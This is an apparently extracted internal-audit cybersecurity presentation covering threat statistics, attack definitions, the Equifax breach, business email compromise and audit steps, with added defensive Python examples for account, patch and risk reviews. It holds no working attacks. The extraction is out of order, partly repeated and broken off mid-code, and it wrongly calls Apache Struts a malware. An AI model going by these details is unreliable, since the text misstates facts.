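The access points above can be turned into repeatable checks. The Python below is an added example written for this page (not a Stinnett or presentation artifact): it reviews a constructed account list against an assumed password standard that is stricter for privileged accounts, flags privileged accounts that carry a mailbox (a sign they are used for daily tasks), and raises an alert when a constructed directory log shows a member being added to a privileged group. The policy values, group names, account names and log format are all assumptions.

```python
import re
from dataclasses import dataclass

# Assumed policy: privileged accounts are held to a higher standard than
# standard accounts (longer passwords, shorter rotation, never shared).
POLICY = {
    "standard":   {"min_length": 12, "max_age_days": 180},
    "privileged": {"min_length": 16, "max_age_days": 90},
}
# Assumed names of groups that grant elevated privileges.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Global Administrator"}


@dataclass(frozen=True)
class Account:
    name: str
    privileged: bool
    has_mailbox: bool        # a mailbox on the account means it is used for email
    password_length: int
    password_age_days: int
    shared: bool             # credential known to more than one person


def review_accounts(accounts):
    """Return (account, issue) pairs for every deviation from the assumed standard."""
    findings = []
    for a in accounts:
        tier = "privileged" if a.privileged else "standard"
        rule = POLICY[tier]
        if a.privileged and a.has_mailbox:
            findings.append((a.name, "privileged account used for email/daily tasks"))
        if a.password_length < rule["min_length"]:
            findings.append((a.name, f"password shorter than {tier} minimum of {rule['min_length']}"))
        if a.password_age_days > rule["max_age_days"]:
            findings.append((a.name, f"password older than {tier} maximum of {rule['max_age_days']} days"))
        if a.shared:
            findings.append((a.name, "shared credential; no individual accountability"))
    return findings


# Assumed log format for directory group changes (constructed for the example).
LOG_LINE = re.compile(
    r'action=(?P<action>\S+) target=(?P<target>\S+) group="(?P<group>[^"]+)" by=(?P<actor>\S+)'
)


def privilege_change_alerts(log_lines):
    """Alert on every addition to a privileged group: (who was added, group, who did it)."""
    alerts = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if m and m["action"] == "GroupMemberAdded" and m["group"] in PRIVILEGED_GROUPS:
            alerts.append((m["target"], m["group"], m["actor"]))
    return alerts


# Constructed sample data.
SAMPLE_ACCOUNTS = [
    Account("jdoe", False, True, 14, 60, False),            # compliant standard user
    Account("jdoe-adm", True, False, 20, 30, False),        # compliant separate admin account
    Account("helpdesk-admin", True, True, 12, 200, True),   # shared admin account used for email
    Account("svc_backup", False, False, 8, 400, False),     # stale, short service password
]
SAMPLE_LOG = [
    '2019-03-04T09:12:05Z action=GroupMemberAdded target=tsmith group="Domain Admins" by=jdoe-adm',
    '2019-03-04T09:15:41Z action=GroupMemberAdded target=tsmith group="Sales" by=hr-admin',
    '2019-03-04T11:02:13Z action=GroupMemberRemoved target=oldadmin group="Domain Admins" by=jdoe-adm',
]

if __name__ == "__main__":
    for name, issue in review_accounts(SAMPLE_ACCOUNTS):
        print(f"FINDING  {name:15s} {issue}")
    for target, group, actor in privilege_change_alerts(SAMPLE_LOG):
        print(f"ALERT    {target} added to {group} by {actor}")
```

An auditor would feed the first function an export of the directory or HR system rather than the constructed list, and would pair the second with the question the slide asks: who receives the alert, and how quickly.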
CYBERSECURITY - WHAT INTERNAL AUDIT CAN DO

Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures, which includes:
  • 99% of exploited vulnerabilities were compromised more than a year after the patch was published
  • Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
• Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
• Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place
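As an added example for this page (not code from the presentation), the Python below runs the vulnerability management checks above over a constructed device inventory: devices still unpatched past an assumed SLA, devices past the one-year mark the slide cites, risks management has formally accepted, devices the scanner never sees, and devices the scanner sees that are missing from the inventory. The SLA values, hostnames, dates and ticket id are all constructed.

```python
from datetime import date

# Assumed patching SLAs by exposure, and the escalation point taken from the
# slide's statistic that most exploitation happens more than a year after the patch.
SLA_DAYS = {"internet-facing": 30, "internal": 90}
CRITICAL_AGE_DAYS = 365


def patch_age_days(device, as_of):
    """Days the device has been (or was) exposed: from vendor release until the
    patch was applied, or until the review date if it is still unpatched."""
    end = device["patch_applied"] or as_of
    return (end - device["patch_published"]).days


def review_inventory(inventory, scanned_hosts, accepted_risks, as_of):
    """Return (host, severity, message) findings for the audit workpaper."""
    findings = []
    known = set()
    for d in inventory:
        known.add(d["host"])
        if d["host"] not in scanned_hosts:
            findings.append((d["host"], "coverage", "not present in vulnerability scan results"))
        if d["patch_applied"] is not None:
            continue  # patched; nothing outstanding for this device
        age = patch_age_days(d, as_of)
        sla = SLA_DAYS[d["exposure"]]
        if d["host"] in accepted_risks:
            findings.append((d["host"], "accepted",
                             f"unpatched {age} days; risk accepted under {accepted_risks[d['host']]}, "
                             "verify the mitigating controls"))
        elif age > CRITICAL_AGE_DAYS:
            findings.append((d["host"], "critical",
                             f"unpatched {age} days, beyond the one-year window in which most exploitation occurs"))
        elif age > sla:
            findings.append((d["host"], "high",
                             f"unpatched {age} days, past the {sla}-day SLA for {d['exposure']} devices"))
    # Devices the scanner found that nobody put in the inventory: the "unknown devices" gap.
    for host in sorted(scanned_hosts - known):
        findings.append((host, "inventory", "device seen by scanner but missing from the asset inventory"))
    return findings


# Constructed sample data.
AS_OF = date(2019, 4, 1)
INVENTORY = [
    {"host": "web01",  "exposure": "internet-facing", "patch_published": date(2019, 2, 15), "patch_applied": None},
    {"host": "mail01", "exposure": "internet-facing", "patch_published": date(2019, 3, 20), "patch_applied": None},
    {"host": "fs01",   "exposure": "internal",        "patch_published": date(2018, 1, 10), "patch_applied": None},
    {"host": "db01",   "exposure": "internal",        "patch_published": date(2018, 2, 1),  "patch_applied": None},
    {"host": "ws-101", "exposure": "internal",        "patch_published": date(2019, 1, 5),  "patch_applied": date(2019, 1, 20)},
]
SCANNED_HOSTS = {"web01", "mail01", "fs01", "db01", "printer-3"}
ACCEPTED_RISKS = {"fs01": "RISK-0042 (placeholder ticket id)"}

if __name__ == "__main__":
    for host, severity, message in review_inventory(INVENTORY, SCANNED_HOSTS, ACCEPTED_RISKS, AS_OF):
        print(f"{severity:9s} {host:10s} {message}")
```

The two non-patch severities matter as much as the patch ones for the slide's argument: a device the scanner never sees cannot be assessed at all, and a device the scanner sees but the inventory does not is exactly how companies end up not knowing what is on their network.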
CYBERSECURITY - SUMMARY QUICK HIT LIST

REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
ANATOMY OF AN ATTACK
QUESTIONS

David Losacco, Principal
mobile: (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett & Associates - stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
THEY WANT OUR MONEY

Financial gain is still the #1 factor for cyber attacks and breaches, at over 75% in 2017. Espionage and other factors combined still make up less than 25%.
• Personally Identifiable Information (PII) is worth more on the black market ("The Dark Web") than credit card numbers
• Ransomware payments were estimated at over $1 billion in 2017; 70% of all ransomware was paid
• Email scams cost businesses over $12 Billion in 2018
• 10% of laundered money is attributable to cyber crime. That number is $200 Billion
Source: Verizon Data Breach Investigations Report 2018
HOW DO THEY DO IT?

Cyber criminals have multiple means to achieve financial gain:
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling of stolen credit cards
• Selling of PII and PHI data
• Insider trading information
• Using the compromised environment for other attacks or for rent (cryptojacking)
EVERCHANGING LANDSCAPE

The types of cyber attacks and exploits are changing:
• Server attacks, once at 50%, are trending down
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks
COMMON TERMS AND DEFINITIONS

Information Technology (IT) - The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise. The department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.

Operational Technology (OT) - The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).

Internet of Things - A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
ATTACKS IN THE HEADLINES
https://www.businessinsider.com/hackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
https://jsis.washington.edu/news/cyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
COMMON TERMS AND DEFINITIONS

Bot - A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.

Botnet - A number of Internet-connected devices (e.g. computers, DVR systems and other devices) that have been infected with malware, each of which is running one or more bots. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.

Denial of Service (DoS) and Distributed Denial of Service (DDoS) - A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A Distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected and part of a botnet.
ATTACKS IN THE HEADLINES
https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html
https://www.wired.com/story/reaper-iot-botnet-infected-million-networks
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
BEC ATTACK WALKTHROUGH
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash.
Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email).
• Reports that generate overdue receivables timely for follow-up.
• Elevation rules for overdue receivables.
Cash Disbursements
• SOD – limit access to the vendor master file.
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change.
• Vendor set-up – verification of the information provided.
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors.
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used.
• Multi-factor authentication.
Other Processes to Consider
• Treasury
• Payroll
• Royalties
• Cyber Insurance
• Legal Liabilities
• Contract Language
• SOX Impact
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes.
• Office 365 and other cloud-based services should all use multi-factor authentication.
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. It is also called the Castle Approach (once you breach the walls, more defenses are in place).
CYBERSECURITY DEFENSE IN-DEPTH – areas to evaluate:
• Patch Management
• Network Vulnerability Scanning
• Internal & External Network Boundaries
• Firewall Implementation and Monitoring (including NextGen)
• Firewall Dataflow & Standards Documentation
• Security Incident Management
• Evaluation of Encryption Technologies
• Workstation Endpoint Protection
• Operating System EOL
• Security Staffing
• Wireless Security
• IPS / IDS / SIEM Implementations
• Cloud Service Provider Evaluations
• Physical Security
• Network Access Control
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets.
Step 2 - Perform a baseline gap analysis of the current control environment against industry-standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets.
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls.
Step 4 - Follow-up reviews to monitor control implementation progress.
Repeat.
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist.
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified.
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event.
• Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks and to identify, estimate and prioritize information security risks.
Process: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident.
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business.
[Example screenshot of a critical data asset risk assessment; the image is not reproduced in the extracted text]
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place.
• Evaluate control design as it relates to commonly accepted framework(s).
• Identify control gaps and create a baseline for cybersecurity maturity in the organization.
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest-priority, most impactful controls that should be implemented first.
STEP 3 - CONTROLS ANALYSIS
• The Baseline Gap Analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment).
• Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap.
[Chart: MITIGATING CONTROL COUNTS – bar chart of how many times each mitigating control reduced risk; the bar labels are not recoverable from the extracted text]
A) Identify information systems with calculated cybersecurity risk > 100.
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes / No)? If yes, move to the next step.
C) Identify mitigating controls to implement to mitigate the threat.
D) Total all instances where controls reduced risk.
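Added example (not the presentation's own method): the Python below carries the Step 1 semi-qualitative scoring and the Step 3 steps A to D through on constructed data. The scoring scale (each factor 1 to 5, risk = asset value × likelihood × impact, so the threshold of 100 above is exceeded only by the most severe combinations), the threat-to-control mapping and the sample systems are all assumptions made for this example; the control names follow the defense-in-depth list earlier in the deck.

```python
from collections import Counter
from dataclasses import dataclass

# Assumed scale (not from the deck): each factor is scored 1 to 5 and
# risk = asset_value * likelihood * impact, so the maximum is 125 and the
# deck's threshold of 100 is exceeded only by the most severe combinations.
RISK_THRESHOLD = 100

# Assumed threat-to-control mapping, constructed for the example. Control
# names follow the defense-in-depth list earlier in the deck.
MITIGATING_CONTROLS = {
    "ransomware": ["Patch Management", "Workstation Endpoint Protection", "Security Incident Management"],
    "phishing/BEC": ["Multi-factor Authentication", "Security Awareness Training"],
    "unpatched exploit": ["Patch Management", "Network Vulnerability Scanning"],
    "data exfiltration": ["Network Access Control", "Evaluation of Encryption Technologies"],
}


@dataclass
class ThreatScore:
    """One (information system, specific threat) row of the risk assessment."""
    system: str
    threat: str
    asset_value: int  # 1-5, from the asset classification in Step 1
    likelihood: int   # 1-5
    impact: int       # 1-5

    @property
    def risk(self) -> int:
        return self.asset_value * self.likelihood * self.impact


def systems_over_threshold(scores, threshold=RISK_THRESHOLD) -> set:
    """Step A: information systems with any calculated risk above the threshold."""
    return {s.system for s in scores if s.risk > threshold}


def threats_over_threshold(scores, threshold=RISK_THRESHOLD) -> list:
    """Step B: the specific (system, threat) rows whose risk is over the threshold."""
    return [s for s in scores if s.risk > threshold]


def mitigating_control_counts(scores, threshold=RISK_THRESHOLD) -> Counter:
    """Steps C and D: map each over-threshold threat to its mitigating controls and
    total the instances where each control reduces risk."""
    counts = Counter()
    for s in threats_over_threshold(scores, threshold):
        counts.update(MITIGATING_CONTROLS.get(s.threat, []))
    return counts


def prioritized_controls(scores, threshold=RISK_THRESHOLD) -> list:
    """Controls ordered by how many high-risk threats they reduce, most impactful first."""
    return [control for control, _ in mitigating_control_counts(scores, threshold).most_common()]


# Constructed sample assessment rows (example data, not a real client).
SAMPLE_SCORES = [
    ThreatScore("ERP (vendor master / AP)", "phishing/BEC", 5, 5, 5),   # 125
    ThreatScore("ERP (vendor master / AP)", "ransomware", 5, 4, 5),     # 100: not over the threshold
    ThreatScore("HR / payroll system", "phishing/BEC", 5, 5, 5),        # 125
    ThreatScore("HR / payroll system", "data exfiltration", 5, 5, 5),   # 125
    ThreatScore("Customer web portal", "unpatched exploit", 5, 5, 5),   # 125
    ThreatScore("Customer web portal", "ransomware", 3, 3, 3),          # 27
]


if __name__ == "__main__":
    print("Systems over threshold:", sorted(systems_over_threshold(SAMPLE_SCORES)))
    for control, count in mitigating_control_counts(SAMPLE_SCORES).most_common():
        print(f"{count:3d}  {control}")
```

The output of `mitigating_control_counts` is the data behind a "mitigating control counts" chart like the one on this slide: the controls with the highest totals are the ones that reduce risk for the greatest number of critical data assets and belong at the top of the implementation roadmap. Note the strict comparison: a row scored exactly 100 is not carried forward, matching the "> 100" wording of step A.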
STEP 4 - CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position.
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity.
COBIT process capability levels:
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. – Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX.
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email.
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing).
• Consider how IT monitors and is alerted on changes to elevated privileges.
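Added example, not from the presentation: a Python audit test over a constructed account export that applies the daily-use, password-standard and sharing checks above. The password policy thresholds, the account records and the use of a mailbox as the indicator that a privileged account is used for daily tasks are assumptions made for this example.

```python
from datetime import date

# Assumed policy thresholds (the deck asks that privileged accounts be held to a
# higher standard; the specific numbers are an assumption for the example).
STANDARD_POLICY = {"min_length": 8, "max_age_days": 90}
PRIVILEGED_POLICY = {"min_length": 14, "max_age_days": 45}

# Assumed audit date.
AS_OF = date(2019, 3, 1)

# Constructed account export (example data), as an auditor might receive from the
# identity system. "mailbox" is used here as the indicator that an account is used
# for daily tasks such as email and browsing.
ACCOUNTS = [
    {"id": "jdoe", "privileged": False, "mailbox": True, "pw_length": 10,
     "pw_changed": date(2019, 1, 10), "owners": ["J. Doe"]},
    {"id": "jdoe-adm", "privileged": True, "mailbox": False, "pw_length": 16,
     "pw_changed": date(2019, 2, 1), "owners": ["J. Doe"]},
    {"id": "svc-backup", "privileged": True, "mailbox": False, "pw_length": 20,
     "pw_changed": date(2017, 6, 1), "owners": ["IT Ops"]},
    {"id": "itadmin", "privileged": True, "mailbox": True, "pw_length": 9,
     "pw_changed": date(2019, 2, 15), "owners": ["A. Smith", "B. Jones"]},
]


def review_accounts(accounts, as_of=AS_OF) -> list:
    """Apply the checks from the slide and return (account id, finding) pairs."""
    findings = []
    for acct in accounts:
        # Privileged accounts are measured against the stricter policy.
        policy = PRIVILEGED_POLICY if acct["privileged"] else STANDARD_POLICY
        if acct["privileged"] and acct["mailbox"]:
            findings.append((acct["id"], "privileged account has a mailbox: likely used for daily tasks"))
        if acct["pw_length"] < policy["min_length"]:
            findings.append((acct["id"], f"password shorter than policy minimum of {policy['min_length']}"))
        if (as_of - acct["pw_changed"]).days > policy["max_age_days"]:
            findings.append((acct["id"], f"password older than policy maximum of {policy['max_age_days']} days"))
        if len(acct["owners"]) > 1:
            findings.append((acct["id"], "account shared by more than one person"))
    return findings


def run_review() -> list:
    return review_accounts(ACCOUNTS)


if __name__ == "__main__":
    for account_id, finding in run_review():
        print(f"{account_id}: {finding}")
```

In the sample data the separate `jdoe-adm` account passes every check, which is the pattern the slide is asking for: a person's daily account and their administrative account are distinct, and the administrative one meets the stricter standard. The shared `itadmin` account with a mailbox fails three checks at once.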
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end user training around cybersecurity. Oftentimes the uneducated or untrained end user is the cyber attacker's first entry point into the company.
• Determine whether your company conducts random phishing awareness training campaigns.
• Evaluate your company's overall cybersecurity training and awareness program.
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures. This includes:
  • 99% of exploited vulnerabilities were compromised more than a year after the patch was published.
  • Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process.
• Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly.
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place.
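Added example, not from the presentation: a Python script that applies the vulnerability management checks above to a constructed asset inventory and scanner export. It reports findings whose vendor fix has been available for more than a year (the 99% statistic above), findings on hosts the inventory does not know about, and findings management has formally accepted. Host names, products, descriptions and dates are constructed; the one-year threshold and the inventory/scanner record formats are assumptions for this example.

```python
from datetime import date

# Constructed sample data (not from the deck): what an auditor might pull from
# the asset inventory (CMDB) and from the vulnerability scanner's export.
INVENTORY = {"ws-001", "ws-002", "srv-erp-01", "fw-edge-01", "vmw-host-01"}

# (host, product, finding description, date the vendor published the fix)
SCAN_FINDINGS = [
    ("ws-001", "Adobe Reader", "known remote code execution flaw, vendor fix available", date(2017, 3, 1)),
    ("srv-erp-01", "Java runtime", "known deserialization flaw, vendor fix available", date(2017, 9, 15)),
    ("fw-edge-01", "Firewall firmware", "known authentication bypass, vendor fix available", date(2016, 11, 20)),
    ("vmw-host-01", "VMware ESXi", "known guest escape flaw, vendor fix available", date(2018, 10, 1)),
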